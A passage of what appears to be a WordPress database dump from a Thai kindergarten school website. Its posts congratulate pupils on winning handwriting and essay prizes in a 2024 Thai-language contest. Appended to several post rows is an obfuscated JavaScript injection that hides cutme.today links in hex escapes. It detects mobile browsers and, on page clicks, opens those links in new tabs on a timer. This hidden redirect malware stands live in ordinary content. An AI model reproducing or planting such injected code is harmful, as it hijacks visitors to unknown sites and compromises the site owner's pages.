|nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','โรงเรียนอนุบาลวัดพระโต ขอแสดงความยินดีกับนักเรียนคนเก่ง เด็กหญิงชญานิศ ครัวกระโทก ได้รับรางวัลชนะเลิศ กิจกรรมการคัดลายมือ ชั้นป.๑-๓ เด็กหญิงนงนภัส สังขาว ได้รับรางวัลชนะเลิศ กิจกรรมการเขียนเรียงความ ชั้นป.๔-๖ โครงการรักษ์ภาษาไทย ระดับเขตพื้นที่การศึกษา เนื่องในสัปดาห์วันภาษาไทยแห่งชาติ ปี ๒๕๖๗ ครูผู้ฝึกสอน คุณครูเกษมณี เมตตามนุษย์ คุณครูชัญญาภรณ์ ถนอมทรัพย์','','publish','open','open','','%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%ad%e0%b8%99%e0%b8%b8%e0%b8%9a%e0%b8%b2%e0%b8%a5%e0%b8%a7%e0%b8%b1%e0%b8%94%e0%b8%9e%e0%b8%a3%e0%b8%b0%e0%b9%82%e0%b8%95-8','','','2024-08-15 11:12:26','2024-08-15 04:12:26','',0,'http://watprato.ssk.in.th/?p=189',0,'post','',0),
(190,2,'2024-08-15 11:06:47','2024-08-15 04:06:47','','453598109_122166666050202781_4790432778834187912_n','','inherit','open','closed','','453598109_122166666050202781_4790432778834187912_n','','','2024-08-15 11:06:47','2024-08-15 04:06:47','',189,'http://watprato.ssk.in.th/wp-content/uploads/2024/08/453598109_122166666050202781_4790432778834187912_n.jpg',0,'attachment','image/jpeg',0),
(191,2,'2024-08-15 11:07:03','2024-08-15 04:07:03','<!-- wp:paragraph -->\n<p>โรงเรียนอนุบาลวัดพระโต</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>ขอแสดงความยินดีกับนักเรียนคนเก่ง <img height=\"16\" width=\"16\" alt=\"✨\" src=\"https://static.xx.fbcdn.net/images/emoji.php/v9/tf4/1/16/2728.png\"></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><img height=\"16\" width=\"16\" alt=\"?\" src=\"https://static.xx.fbcdn.net/images/emoji.php/v9/t94/1/16/1f947.png\">เด็กหญิงชญานิศ ครัวกระโทก</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>ได้รับรางวัลชนะเลิศ กิจกรรมการคัดลายมือ ชั้นป.๑-๓</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><img height=\"16\" width=\"16\" alt=\"?\" src=\"https://static.xx.fbcdn.net/images/emoji.php/v9/t94/1/16/1f947.png\">เด็กหญิงนงนภัส สังขาว</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a></a>ได้รับรางวัลชนะเลิศ กิจกรรมการเขียนเรียงความ ชั้นป.๔-๖</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>โครงการรักษ์ภาษาไทย ระดับเขตพื้นที่การศึกษา</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>เนื่องในสัปดาห์วันภาษาไทยแห่งชาติ ปี ๒๕๖๗</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>สำนักงานเขตพื้นที่การศึกษาประถมศึกษาศรีสะเกษ เขต ๑</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>ครูผู้ฝึกสอน</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>คุณครูเกษมณี เมตตามนุษย์</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>คุณครูชัญญาภรณ์ ถนอมทรัพย์</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p><a href=\"https://www.facebook.com/photo/?fbid=122167462832202781&amp;set=pcb.122167462958202781&amp;__cft__[0]=AZW5vAZWYLNOc-3NxaBIh0RP9dBscHB9PcwqD9CTLy8zM1_7Afpf3avTOKhMqyebNCdXmEXvGbIRFR8xVUbjB7zsDkLX4D0SVUrSzZ4F_CWA332v77NfmbZqq9laToThl5nee5vwbVKENOooZWC1OZzbLX1I3B2qTWQNYnmUF8K1GW4lLq0tqGK11GFc81LfNkRmOD2YUy4GygFn2Fa7kS7q&amp;__tn__=*bH-R\"></a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image\"><a href=\"https://www.facebook.com/photo/?fbid=122167462832202781&amp;set=pcb.122167462958202781&amp;__cft__[0]=AZW5vAZWYLNOc-3NxaBIh0RP9dBscHB9PcwqD9CTLy8zM1_7Afpf3avTOKhMqyebNCdXmEXvGbIRFR8xVUbjB7zsDkLX4D0SVUrSzZ4F_CWA332v77NfmbZqq9laToThl5nee5vwbVKENOooZWC1OZzbLX1I3B2qTWQNYnmUF8K1GW4lLq0tqGK11GFc81LfNkRmOD2YUy4GygFn2Fa7kS7q&amp;__tn__=*bH-R\"><img src=\"https://scontent.fnak1-1.fna.fbcdn.net/v/t39.30808-6/453871324_122167463000202781_2692582071386976619_n.jpg?stp=dst-jpg_p600x600&amp;_nc_cat=100&amp;ccb=1-7&amp;_nc_sid=833d8c&amp;_nc_ohc=i7Wuo4G5aJAQ7kNvgGAn2o-&amp;_nc_ht=scontent.fnak1-1.fna&amp;oh=00_AYBiBJlNjHSucpb8Z2HlG4VygZ4XNos47NG-NJdQ9Vc_-Q&amp;oe=66C33C9E\" alt=\"\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p><a href=\"https://www.facebook.com/photo/?fbid=122167462862202781&amp;set=pcb.122167462958202781&amp;__cft__[0]=AZW5vAZWYLNOc-3NxaBIh0RP9dBscHB9PcwqD9CTLy8zM1_7Afpf3avTOKhMqyebNCdXmEXvGbIRFR8xVUbjB7zsDkLX4D0SVUrSzZ4F_CWA332v77NfmbZqq9laToThl5nee5vwbVKENOooZWC1OZzbLX1I3B2qTWQNYnmUF8K1GW4lLq0tqGK11GFc81LfNkRmOD2YUy4GygFn2Fa7kS7q&amp;__tn__=*bH-R\"></a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image\"><a href=\"https://www.facebook.com/photo/?fbid=122167462862202781&amp;set=pcb.122167462958202781&amp;__cft__[0]=AZW5vAZWYLNOc-3NxaBIh0RP9dBscHB9PcwqD9CTLy8zM1_7Afpf3avTOKhMqyebNCdXmEXvGbIRFR8xVUbjB7zsDkLX4D0SVUrSzZ4F_CWA332v77NfmbZqq9laToThl5nee5vwbVKENOooZWC1OZzbLX1I3B2qTWQNYnmUF8K1GW4lLq0tqGK11GFc81LfNkRmOD2YUy4GygFn2Fa7kS7q&amp;__tn__=*bH-R\"><img src=\"https://scontent.fnak1-1.fna.fbcdn.net/v/t39.30808-6/453906218_122167463012202781_5126343557949610556_n.jpg?stp=dst-jpg_p600x600&amp;_nc_cat=100&amp;ccb=1-7&amp;_nc_sid=833d8c&amp;_nc_ohc=kQRKxHK3JFsQ7kNvgF_VQlm&amp;_nc_ht=scontent.fnak1-1.fna&amp;oh=00_AYCT_ZF2lIpB_-6qW__sVUZy0CYgfgwfL-nyCX1xDUvdbw&amp;oe=66C34D0D\" alt=\"\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>ความรู้สึกทั้งหมด</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>23Kanokwan T Atthawan, Aksarapak Srijan&nbsp;และ&nbsp;คนอื่นๆ อีก 21 คน</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','โรงเรียนอนุบาลวัดพระโต','','inherit','closed','closed','','189-revision-v1','','','2024-08-15 11:07:03','2024-08-15 04:07:03','',189,'http://watprato.ssk.in.th/?p=191',0,'revision','',0),
(192,2,'2024-08-15 11:08:43','2024-08-15 04:08:43','','453195035_122166674972202781_6455172251476872797_n','','inherit','open','closed','','453195035_122166674972202781_6455172251476872797_n','','','2024-08-15 11:08:43','2024-08-15 04:08:43','',189,'http://watprato.ssk.in.th/wp-content/uploads/2024/08/453195035_122166674972202781_6455172251476872797_n.jpg',0,'attachment','image/jpeg',0),
(194,2,'2024-08-15 11:12:24','2024-08-15 04:12:24','<!-- wp:paragraph -->\n<p><a href=\"https://www.facebook.com/photo/?fbid=122167462832202781&amp;set=pcb.122167462958202781&amp;__cft__[0]=AZW5vAZWYLNOc-3NxaBIh0RP9dBscHB9PcwqD9CTLy8zM1_7Afpf3avTOKhMqyebNCdXmEXvGbIRFR8xVUbjB7zsDkLX4D0SVUrSzZ4F_CWA332v77NfmbZqq9laToThl5nee5vwbVKENOooZWC1OZzbLX1I3B2qTWQNYnmUF8K1GW4lLq0tqGK11GFc81LfNkRmOD2YUy4GygFn2Fa7kS7q&amp;__tn__=*bH-R\"></a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image\"><a href=\"https://www.facebook.com/photo/?fbid=122167462832202781&amp;set=pcb.122167462958202781&amp;__cft__[0]=AZW5vAZWYLNOc-3NxaBIh0RP9dBscHB9PcwqD9CTLy8zM1_7Afpf3avTOKhMqyebNCdXmEXvGbIRFR8xVUbjB7zsDkLX4D0SVUrSzZ4F_CWA332v77NfmbZqq9laToThl5nee5vwbVKENOooZWC1OZzbLX1I3B2qTWQNYnmUF8K1GW4lLq0tqGK11GFc81LfNkRmOD2YUy4GygFn2Fa7kS7q&amp;__tn__=*bH-R\"><img src=\"https://scontent.fnak1-1.fna.fbcdn.net/v/t39.30808-6/453871324_122167463000202781_2692582071386976619_n.jpg?stp=dst-jpg_p600x600&amp;_nc_cat=100&amp;ccb=1-7&amp;_nc_sid=833d8c&amp;_nc_ohc=i7Wuo4G5aJAQ7kNvgGAn2o-&amp;_nc_ht=scontent.fnak1-1.fna&amp;oh=00_AYBiBJlNjHSucpb8Z2HlG4VygZ4XNos47NG-NJdQ9Vc_-Q&amp;oe=66C33C9E\" alt=\"\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p><a href=\"https://www.facebook.com/photo/?fbid=122167462862202781&amp;set=pcb.122167462958202781&amp;__cft__[0]=AZW5vAZWYLNOc-3NxaBIh0RP9dBscHB9PcwqD9CTLy8zM1_7Afpf3avTOKhMqyebNCdXmEXvGbIRFR8xVUbjB7zsDkLX4D0SVUrSzZ4F_CWA332v77NfmbZqq9laToThl5nee5vwbVKENOooZWC1OZzbLX1I3B2qTWQNYnmUF8K1GW4lLq0tqGK11GFc81LfNkRmOD2YUy4GygFn2Fa7kS7q&amp;__tn__=*bH-R\"></a></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:image {\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image\"><a href=\"https://www.facebook.com/photo/?fbid=122167462862202781&amp;set=pcb.122167462958202781&amp;__cft__[0]=AZW5vAZWYLNOc-3NxaBIh0RP9dBscHB9PcwqD9CTLy8zM1_7Afpf3avTOKhMqyebNCdXmEXvGbIRFR8xVUbjB7zsDkLX4D0SVUrSzZ4F_CWA332v77NfmbZqq9laToThl5nee5vwbVKENOooZWC1OZzbLX1I3B2qTWQNYnmUF8K1GW4lLq0tqGK11GFc81LfNkRmOD2YUy4GygFn2Fa7kS7q&amp;__tn__=*bH-R\"><img src=\"https://scontent.fnak1-1.fna.fbcdn.net/v/t39.30808-6/453906218_122167463012202781_5126343557949610556_n.jpg?stp=dst-jpg_p600x600&amp;_nc_cat=100&amp;ccb=1-7&amp;_nc_sid=833d8c&amp;_nc_ohc=kQRKxHK3JFsQ7kNvgF_VQlm&amp;_nc_ht=scontent.fnak1-1.fna&amp;oh=00_AYCT_ZF2lIpB_-6qW__sVUZy0CYgfgwfL-nyCX1xDUvdbw&amp;oe=66C34D0D\" alt=\"\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p>ความรู้สึกทั้งหมด</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>23Kanokwan T Atthawan, Aksarapak Srijan&nbsp;และ&nbsp;คนอื่นๆ อีก 21 คน</p>\n<!-- /wp:paragraph -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x